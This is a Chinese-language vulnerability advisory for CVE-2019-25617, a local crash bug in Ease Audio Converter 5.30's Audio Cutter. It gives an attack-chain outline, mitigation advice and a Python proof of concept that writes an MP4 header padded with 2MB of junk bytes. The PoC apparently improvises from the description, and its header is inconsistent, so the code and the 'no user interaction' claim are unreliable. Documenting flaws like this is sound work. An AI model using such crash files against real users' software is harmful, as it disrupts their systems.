IPBUF安全漏洞报告
English
CVE-2019-25617 CVSS 6.2 中危

CVE-2019-25617: Ease Audio Converter拒绝服务漏洞

披露日期: 2026-03-22

漏洞信息

漏洞编号
CVE-2019-25617
漏洞类型
拒绝服务
CVSS评分
6.2 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ease Audio Converter

相关标签

拒绝服务缓冲区溢出Ease Audio Converter本地文件漏洞

漏洞概述

Ease Audio Converter 5.30 版本的 Audio Cutter 组件存在拒绝服务漏洞。攻击者可利用本地访问权限,通过处理包含超大缓冲区的畸形 MP4 文件,触发应用程序崩溃,从而破坏系统服务的可用性。

技术细节

该漏洞源于 Ease Audio Converter 5.30 在 Audio Cutter 功能中对 MP4 文件格式的解析逻辑存在缺陷。软件在处理特定 MP4 文件结构时,未对缓冲区大小进行严格校验。攻击者可构造一个包含恶意超大缓冲区的畸形 MP4 文件。当该文件被加载至 Audio Cutter 界面时,由于数据量超出预设缓冲区限制,导致内存访问越界或资源耗尽,进而引发应用程序异常终止。该漏洞攻击向量为本地,无需用户交互即可被触发。

攻击链分析

STEP 1
侦察
确认目标系统安装了 Ease Audio Converter 5.30 版本。
STEP 2
武器化
利用脚本生成包含超大缓冲区的畸形 MP4 文件。
STEP 3
传递
将生成的恶意文件放置在目标系统可访问的路径。
STEP 4
利用
通过 Audio Cutter 界面加载并处理该畸形文件。
STEP 5
影响
应用程序因处理异常数据而崩溃,导致服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Generator for CVE-2019-25617 # This script generates a malformed MP4 file with an oversized buffer # to trigger a Denial of Service in Ease Audio Converter 5.30. import struct def generate_poc(filename): # Basic MP4 header (ftyp box) to make it look like a valid container # Size (4 bytes) + Type (4 bytes) header = b'\x00\x00\x00\x20' # Box size: 32 bytes header += b'ftyp' # Box type header += b'isom' # Major brand header += b'\x00\x00\x02\x00' # Minor version header += b'isom' # Compatible brand # Create an oversized buffer (payload) to trigger the crash # The description mentions an 'oversized buffer', so we append junk data. junk_data = b'A' * 0x200000 # 2MB of 'A's with open(filename, 'wb') as f: f.write(header) f.write(junk_data) print(f'[+] Malformed MP4 file generated: {filename}') print(f'[+] Load this file in Ease Audio Cutter to reproduce the vulnerability.') if __name__ == '__main__': generate_poc('exploit_CVE_2019_25617.mp4')

影响范围

Ease Audio Converter 5.30

防御指南

临时缓解措施
在官方发布修复补丁前,建议用户谨慎处理来源不明的 MP4 文件,特别是在 Audio Cutter 功能中。应加强系统的文件访问控制,避免攻击者上传恶意文件。对于关键业务环境,建议暂时停止使用受影响版本的软件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表